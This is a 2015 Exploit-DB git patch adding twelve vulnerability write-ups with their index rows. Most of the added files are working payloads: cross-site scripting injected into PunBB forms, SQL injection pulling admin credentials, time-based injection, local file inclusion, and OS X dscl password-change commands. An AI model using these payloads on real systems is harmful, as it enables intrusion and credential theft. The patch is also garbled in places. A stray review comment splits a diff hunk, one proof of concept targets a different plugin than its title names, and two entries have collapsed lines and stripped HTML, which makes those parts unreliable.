From 62f8955407902efc856dfd3ced44b8eab7683b3e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 22 Feb 2015 08:37:11 +0000
Subject: [PATCH] Update: 2015-02-22 12 new exploits

---
files.csv | 12 ++++++++
platforms/asp/webapps/36133.txt | 9 ++++++
platforms/asp/webapps/36134.txt | 12 ++++++++
platforms/asp/webapps/36138.txt | 9 ++++++
platforms/asp/webapps/36139.txt | 19 ++++++++++++
platforms/asp/webapps/36141.txt | 9 ++++++
platforms/osx/local/36143.txt | 9 ++++++
platforms/php/webapps/36135.txt | 9 ++++++
platforms/php/webapps/36136.txt | 9 ++++++
platforms/php/webapps/36137.txt | 36 +++++++++++++++++++++++
platforms/php/webapps/36140.txt | 46 ++++++++++++++++++++++++++++++
platforms/php/webapps/36142.txt | 25 ++++++++++++++++
platforms/windows/remote/36128.txt | 9 ++++++
13 files changed, 213 insertions(+)
create mode 100755 platforms/asp/webapps/36133.txt
create mode 100755 platforms/asp/webapps/36134.txt
create mode 100755 platforms/asp/webapps/36138.txt
create mode 100755 platforms/asp/webapps/36139.txt
create mode 100755 platforms/asp/webapps/36141.txt
create mode 100755 platforms/osx/local/36143.txt
create mode 100755 platforms/php/webapps/36135.txt
create mode 100755 platforms/php/webapps/36136.txt
create mode 100755 platforms/php/webapps/36137.txt
create mode 100755 platforms/php/webapps/36140.txt
create mode 100755 platforms/php/webapps/36142.txt
create mode 100755 platforms/windows/remote/36128.txt
diff --git a/files.csv b/files.csv
index 3b616ace4..bc4884195 100755
--- a/files.csv
+++ b/files.csv
@@ -32555,6 +32555,18 @@ id,file,description,date,author,platform,type,port
 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80
 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080
 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80
+36128,platforms/windows/remote/36128.txt,"Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,remote,0
 36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
+36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0
+36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0
+36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0
+36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 'index.php' Local File Include Vulnerability",2011-09-15,KedAns-Dz,php,webapps,0
+36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0
+36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 'id' Parameter SQL Injection Vulnerability",2011-09-18,m3rciL3Ss,asp,webapps,0
+36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0
+36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
+36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 'matchword' Parameter Cross Site Scripting Vulnerability",2011-09-19,"kurdish hackers team",asp,webapps,0
+36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
+36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0
diff --git a/platforms/asp/webapps/36133.txt b/platforms/asp/webapps/36133.txt
new file mode 100755
index 000000000..62b583d65
--- /dev/null
+++ b/platforms/asp/webapps/36133.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49614/info
+
+Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable.
+
+http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/asp/webapps/36134.txt b/platforms/asp/webapps/36134.txt
new file mode 100755
index 000000000..b881017a3
--- /dev/null
+++ b/platforms/asp/webapps/36134.txt
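Review bot: The index row added for 36135 describes an SQL injection in the Auctions plugin's `wpa_id` parameter, but the PoC recorded in platforms/php/webapps/36135.txt in this same commit requests `wp-content/plugins/paid-downloads/download.php?download_key=...`, a different plugin and a different parameter, so one of the two appears to have been mis-pasted. The row for 36128 likewise reads `Wireshark <= 1.6.1` while 36128.txt lists only 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 as affected, which overstates the range for anyone filtering the index by version. Both rows should be reconciled against the cited securityfocus entries before the index is relied on for triage.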
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/49620/info
+
+Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.
+
+The following products are affected;
+
+Microsoft SharePoint 2007
+Microsoft SharePoint 2010
+
+http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss]
\ No newline at end of file
diff --git a/platforms/asp/webapps/36138.txt b/platforms/asp/webapps/36138.txt
new file mode 100755
index 000000000..134f201e8
--- /dev/null
+++ b/platforms/asp/webapps/36138.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49667/info
+
+ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin
\ No newline at end of file
diff --git a/platforms/asp/webapps/36139.txt b/platforms/asp/webapps/36139.txt
new file mode 100755
index 000000000..c127b5d4b
--- /dev/null
+++ b/platforms/asp/webapps/36139.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/49668/info
+
+Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/v1/urundetay.asp?id=21%28%29
+
+http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29
+
+http://www.example.com/v1/linkler.asp?id=2%28%29
+
+http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]
+
+http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]
+
+http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
+
+http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin
\ No newline at end of file
diff --git a/platforms/asp/webapps/36141.txt b/platforms/asp/webapps/36141.txt
new file mode 100755
index 000000000..13686893c
--- /dev/null
+++ b/platforms/asp/webapps/36141.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49674/info
+
+Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS]
\ No newline at end of file
diff --git a/platforms/osx/local/36143.txt b/platforms/osx/local/36143.txt
new file mode 100755
index 000000000..766806d60
--- /dev/null
+++ b/platforms/osx/local/36143.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49676/info
+
+Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.
+
+Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges.
+
+$ dscl localhost -read /Search/Users/bob
+
+$ dscl localhost -passwd /Search/Users/
\ No newline at end of file
diff --git a/platforms/php/webapps/36135.txt b/platforms/php/webapps/36135.txt
new file mode 100755
index 000000000..bac068e35
--- /dev/null
+++ b/platforms/php/webapps/36135.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49625/info
+
+Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable.
+
+http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
\ No newline at end of file
diff --git a/platforms/php/webapps/36136.txt b/platforms/php/webapps/36136.txt
new file mode 100755
index 000000000..cf2114e3c
--- /dev/null
+++ b/platforms/php/webapps/36136.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49650/info
+
+StarDevelop LiveHelp is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+StarDevelop LiveHelp 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/index.php?language_file=[LFI]%00
\ No newline at end of file
diff --git a/platforms/php/webapps/36137.txt b/platforms/php/webapps/36137.txt
new file mode 100755
index 000000000..752f81449
--- /dev/null
+++ b/platforms/php/webapps/36137.txt
@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/49660/info
+
+PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+GET
+/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
+GET
+/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>
+
+POST /delete.php?id=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</
+script>
+
+POST /edit.php?id=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</
+script>
+
+POST /login.php?action=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oin
+k)</script>
+
+POST /misc.php?email=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(o
+ink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
+
+POST
+/profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
+form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><scri
+pt>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script> + +POST /register.php?action=>"'><script>alert(oink)</script> +form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert +(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'> +<script>alert(oink)</script> diff --git a/platforms/php/webapps/36140.txt b/platforms/php/webapps/36140.txt new file mode 100755 index 000000000..5b05f4067 --- /dev/null +++ b/platforms/php/webapps/36140.txt @@ -0,0 +1,46 @@ +source: http://www.securityfocus.com/bid/49673/info + +Toko LiteCMS is prone to an HTTP-response-splitting vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. + +Toko LiteCMS 1.5.2 is vulnerable; other versions may also be affected. + +Cross Site Scripting Vulnerabilities + + +Toko Lite CMS 1.5.2 (EditNavBar.php) Multiple Parameters XSS POST Injection + + +

+
+' /> +' /> +
+ +

Exploit!



+
+
+
+HTTP Response Splitting
+
+====================================================================
+/edit.php:
+--------------------------------------------------------------------
+
+ 3: $charSet = "iso-8859-1";
+ 4: $dir = "ltr";
+ 5:
+ 6: if ( isset( $_POST[ "charSet" ] ) )
+ 7: {
+ 8: $charSet = $_POST[ "charSet" ];
+ 9:
+10: if ( $charSet == "windows-1255" )
+11: {
+12: $dir = "rtl";
+13: }
+14: }
+15:
+16: header( "Content-Type: text/html; charset=" . $charSet );
\ No newline at end of file
diff --git a/platforms/php/webapps/36142.txt b/platforms/php/webapps/36142.txt
new file mode 100755
index 000000000..7e656f1e9
--- /dev/null
+++ b/platforms/php/webapps/36142.txt
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/49675/info
+
+net4visions is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following products are affected:
+
+net4visions iBrowser 1.4.1 Build 10182009
+net4visions iManager 1.2.8 Build 02012008
+net4visions iGallery 1.0.0
+
+iBrowser Plugin
+
+http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/random.php?dir=
+http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=
+
+iManager Plugin
+
+http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/random.php?dir=
+http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=
+
+iGallery Plugin
+
+http://www.example.com/jscripts/tiny_mce/plugins/iGallery/scripts/pthumb/demo/phpThumb.demo.random.php?dir=
\ No newline at end of file
diff --git a/platforms/windows/remote/36128.txt b/platforms/windows/remote/36128.txt
new file mode 100755
index 000000000..701c755ad
--- /dev/null
+++ b/platforms/windows/remote/36128.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49521/info
+
+Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable.
+
+http://www.exploit-db.com/sploits/36128.pcap
\ No newline at end of file